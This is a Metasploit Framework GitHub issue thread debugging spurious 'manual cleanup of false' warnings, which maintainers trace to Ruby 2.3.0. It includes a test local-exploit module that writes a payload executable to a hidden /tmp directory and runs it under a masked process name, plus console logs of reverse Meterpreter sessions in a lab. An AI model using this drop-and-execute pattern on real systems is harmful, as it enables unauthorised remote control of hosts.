Metasploit-framework: `This exploit may require manual cleanup of 'false' on the target`
This exploit may require manual cleanup of 'false' on the target - but false is not a file nor directory, nor was it mentioned anywhere in the module, nor on the filesystem.
Tested with latest Metasploit from Github msf5 branch, which mettle updated to 0.3.7 (master branch uses 0.3.6).
This happens from time to time. Intermittent issue.
Tested on Fedora 19, 20 and 27. Can't reproduce on Fedora 13.
Steps to reproduce
The following local exploit module demonstrates this issue:
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking
include Msf::Post::File
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'Test reg_dir_for_cleanup',
'Description' => %q{
Test
},
'License' => MSF_LICENSE,
'Author' =>
[
'test reg_dir_for_cleanup'
],
'DisclosureDate' => 'test dir cleanup',
'Platform' => [ 'linux' ],
'Arch' => [ ARCH_X86 ],
'SessionTypes' => [ 'shell', 'meterpreter' ],
'Targets' => [[ 'Auto', {} ]],
'References' =>
[
[ ]
]
))
end
def exploit
# create a dir
d = '/tmp/.delete.me.dir'
cmd = "mkdir -p #{d}"
print_status "Running command: #{cmd.inspect}"
output = cmd_exec cmd
output.each_line { |line| vprint_status line.chomp }
register_dir_for_cleanup d
# upload payload
payload_file = "#{d}/.payload.file"
rm_f payload_file
write_file payload_file, generate_payload_exe
register_file_for_cleanup payload_file
cmd_exec "chmod +x #{payload_file}"
# execute
cmd = payload_file
print_status "Running command: #{cmd.inspect}"
output = cmd_exec "bash -c \"exec -a asdf #{cmd}&\""
output.each_line { |line| vprint_status line.chomp }
puts cmd_exec 'echo we made it to the end'
end
end
Example Output
msf5 exploit(linux/local/test_reg_dir_for_cleanup) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
11 shell cmd/unix 172.16.191.244:1337 -> 172.16.191.137:39405 (172.16.191.137)
msf5 exploit(linux/local/test_reg_dir_for_cleanup) > rexploit
[*] Reloading module...
[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 172.16.191.244:4444
[*] Running command: "mkdir -p /tmp/.delete.me.dir"
[*] Running command: "/tmp/.delete.me.dir/.payload.file"
[*] Sending stage (857352 bytes) to 172.16.191.137
[*] Meterpreter session 13 opened (172.16.191.244:4444 -> 172.16.191.137:43509) at 2018-02-05 08:26:10 -0500
we made it to the end
[+] Deleted /tmp/.delete.me.dir/.payload.file
[+] Deleted /tmp/.delete.me.dir
[!] This exploit may require manual cleanup of '/tmp/.delete.me.dir/.payload.file' on the target
[!] This exploit may require manual cleanup of 'false' on the target
[!] This exploit may require manual cleanup of 'false' on the target
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 172.16.191.137 - Meterpreter session 13 closed. Reason: User exit
msf5 exploit(linux/local/test_reg_dir_for_cleanup) > run
[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 172.16.191.244:4444
[*] Running command: "mkdir -p /tmp/.delete.me.dir"
[*] Running command: "/tmp/.delete.me.dir/.payload.file"
[*] Sending stage (857352 bytes) to 172.16.191.137
[*] Meterpreter session 14 opened (172.16.191.244:4444 -> 172.16.191.137:43516) at 2018-02-05 08:26:21 -0500
[+] Deleted /tmp/.delete.me.dir/.payload.file
[+] Deleted /tmp/.delete.me.dir
we made it to the end
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 172.16.191.137 - Meterpreter session 14 closed. Reason: User exit
msf5 exploit(linux/local/test_reg_dir_for_cleanup) > run
[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 172.16.191.244:4444
[*] Running command: "mkdir -p /tmp/.delete.me.dir"
[*] Running command: "/tmp/.delete.me.dir/.payload.file"
[*] Sending stage (857352 bytes) to 172.16.191.137
[*] Meterpreter session 15 opened (172.16.191.244:4444 -> 172.16.191.137:43519) at 2018-02-05 08:26:27 -0500
we made it to the end
[+] Deleted /tmp/.delete.me.dir/.payload.file
[+] Deleted /tmp/.delete.me.dir
[!] This exploit may require manual cleanup of '/tmp/.delete.me.dir/.payload.file' on the target
[!] This exploit may require manual cleanup of 'false' on the target
[!] This exploit may require manual cleanup of 'false' on the target
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 172.16.191.137 - Meterpreter session 15 closed. Reason: User exit
msf5 exploit(linux/local/test_reg_dir_for_cleanup) > run
[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 172.16.191.244:4444
[*] Running command: "mkdir -p /tmp/.delete.me.dir"
[*] Running command: "/tmp/.delete.me.dir/.payload.file"
[*] Sending stage (857352 bytes) to 172.16.191.137
[*] Meterpreter session 16 opened (172.16.191.244:4444 -> 172.16.191.137:43525) at 2018-02-05 08:26:37 -0500
we made it to the end
[+] Deleted /tmp/.delete.me.dir/.payload.file
[+] Deleted /tmp/.delete.me.dir
[!] This exploit may require manual cleanup of '/tmp/.delete.me.dir/.payload.file' on the target
[!] This exploit may require manual cleanup of 'false' on the target
[!] This exploit may require manual cleanup of 'false' on the target
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 172.16.191.137 - Meterpreter session 16 closed. Reason: User exit
bug
bcoles
😕1
All 7 comments
I can't repro this yet. This one's a little strange because I don't see how false is getting into @dropped_files or @dropped_dirs.
wvu-r7
on 7 Feb 2018
I can reproduce this issue reliably on Fedora 20. The issue doesn't occur on Ubuntu 14.
Chatting with @wvu-r7 we narrowed down the cause a bit.
The issue appears to relate to cleanup. In particular, adding the following cleanup method with super consistently reproduces the issue (9 / 10 fails) as per the above output :
def cleanup
puts 'cleanup got called'
super
end
Where as the following cleanup without super resolves the issue (0 / 10 failures):
def cleanup
puts 'cleanup got called'
end
Indicating something funky is happening with the super methods in one of the mixins.
bcoles
on 7 Feb 2018
👍1
In file_dropper.rb, can you please add some debug output like:
# We don't know for sure if paths have been deleted, so always warn about it to the user
$stderr.puts "#{@dropped_files} #{@dropped_dirs}"
(@dropped_files + @dropped_dirs).each do |p|
print_warning("This exploit may require manual cleanup of '#{p}' on the target")
end
so we can see what the actual contents of @dropped_files and @dropped_dirs is here?
Also, could you test with a newer Ruby (2.4.3 would be great) to verify we're not tracking a bug from 2.3.0? Not sure if it makes a difference but it would be good to rule it out.
busterb
on 8 Feb 2018
👍1
Part of what is breaking this appears to be not having any references in the module:
[02/07/2018 17:09:07] [w(0)] core: Exception in on_session_open event handler: NoMethodError: undefined method `refs' for #<Msf::Modules::Mod6578706c6f69742f6c696e75782f6c6f63616c2f626c617267686868::MetasploitModule:0x00007fb47d09fea0>
[02/07/2018 17:09:07] [w(0)] core: Call Stack
/Users/acammack/rapid7/metasploit-framework/lib/msf/core/db_manager/session.rb:132:in `block in infer_vuln_from_session'
acammack-r7
on 8 Feb 2018
interesting, so a silent failure in on_session_open is causing other on_session_opens to fail to run?
busterb
on 8 Feb 2018
Seems this might be related to using Ruby 2.3.0.
I can't reproduce this error with Ruby 2.4.0 or Ruby 2.4.3.
Here's the requested output with the lib/msf/core/exploit/file_dropper.rb patch:
msf5 exploit(linux/local/test_reg_dir_for_cleanup) > set session 1
session => 1
rmsf5 exploit(linux/local/test_reg_dir_for_cleanup) > run
[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 172.16.191.244:4444
[*] Running command: "mkdir -p /tmp/.delete.me.dir"
[*] Running command: "/tmp/.delete.me.dir/.payload.file"
[*] Sending stage (857352 bytes) to 172.16.191.137
[*] Meterpreter session 2 opened (172.16.191.244:4444 -> 172.16.191.137:47894) at 2018-02-08 04:54:45 -0500
[+] Deleted /tmp/.delete.me.dir/.payload.file
[+] Deleted /tmp/.delete.me.dir
we made it to the end
cleanup got called
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 172.16.191.137 - Meterpreter session 2 closed. Reason: User exit
msf5 exploit(linux/local/test_reg_dir_for_cleanup) > run
[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 172.16.191.244:4444
[*] Running command: "mkdir -p /tmp/.delete.me.dir"
[*] Running command: "/tmp/.delete.me.dir/.payload.file"
[*] Sending stage (857352 bytes) to 172.16.191.137
[*] Meterpreter session 3 opened (172.16.191.244:4444 -> 172.16.191.137:47900) at 2018-02-08 04:54:49 -0500
we made it to the end
cleanup got called
[+] Deleted /tmp/.delete.me.dir/.payload.file
[+] Deleted /tmp/.delete.me.dir
["/tmp/.delete.me.dir/.payload.file", false, false] []
[!] This exploit may require manual cleanup of '/tmp/.delete.me.dir/.payload.file' on the target
[!] This exploit may require manual cleanup of 'false' on the target
[!] This exploit may require manual cleanup of 'false' on the target
meterpreter >
This was still an issue last I checked (probably a few weeks ago).
The presence of this bug is a little disconcerting; however, Ruby 2.3.0 is EOL in less than a month.
Closing.
bcoles
on 15 Feb 2019
Was this page helpful?
0 / 5 - 0 ratings
Related issues
anthraxx
路
31Comments
TheBrokenWasp
路
28Comments
h00die
路
39Comments
Ashish882
路
87Comments
kali64amd
路
39Comments